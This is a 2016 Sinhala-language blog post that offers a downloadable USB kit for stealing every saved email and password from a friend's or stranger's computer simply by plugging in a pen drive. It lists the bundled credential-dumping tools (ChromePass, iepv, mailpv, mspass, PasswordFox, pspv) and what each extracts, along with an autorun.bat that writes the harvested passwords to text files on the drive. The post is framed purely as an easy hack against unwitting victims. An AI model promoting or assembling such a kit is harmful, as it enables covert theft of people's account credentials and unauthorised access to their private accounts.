Thursday, February 18, 2016

pen එක ගහපු ගමන් යාළුවගේ pc එකේ තින ඔක්කොම email ටිකයි password ටිකයි ගන්න ඕනනම් මේ ලිපිය කියවන්න

 
අද මම කියන්න යන්නේ හැක් කරන විදිහ pisshing වගේ දුක් විදින්න ඕනේ නෑ.මේකේ කරන්න තියෙන්නේ මම පහලින් දීල තියෙන එක බාගෙන පෙන් එකට කොපි කරලා කාගේ හරි pc එකකට
ගහන එක විතරයි.එතකොට මම දුන්න පොඩි notepad එකට අරකෙ තිබ්බ හැම password එකක්ම ඔයාගේ පෙන් එකේ ගබඩා වෙනවා :) කොහොමද වැඩේ එල නේ නිකන්ම යන්නේ නැතුව comment එකකුත් දාගෙන යන්න  මම කලින් කිව්ව එක මෙතනින් බාගන්න

මේකේ save වන පාස් මේ file වලට එවි :) 

  1. ChromePass.exe - මේකෙන් කරන්නේ පරිගනකයේ Google Chrome බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
  2.  iepv.exe - මේකෙන් කරන්නේ පරිගනකයේ Internet Explorer බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
  3.  mailpv.exe -  මේකෙන් කරන්නේ පරිගනකයේ Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free වල save කර ඇති passwords ලබා ගැනීම
  4.  mspass.exe- මේකෙන් කරන්නේ පරිගනකයේ MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM වල save කර ඇති passwords ලබා ගැනීම
  5.  PasswordFox.exe - මේකෙන් කරන්නේ පරිගනකයේ FireFox බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
  6.  pspv.exe - මේකෙන් කරන්නෙත් පරිගනකයේ Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), වල save කර ඇති passwords ලබා ගැනීම
  7.  autorun.bat - මේකෙන් කරන්නේ අර උඩ කියපු පොඩි පොඩි ‍මෘදුකාංග වලින් ලබා ගන්නා passwords ඔබේ පෙන් එක තුල text files ආකාරයට සේව් කිරීම.
.
Comment එකක් දාගෙනම යන්න :)

2 comments: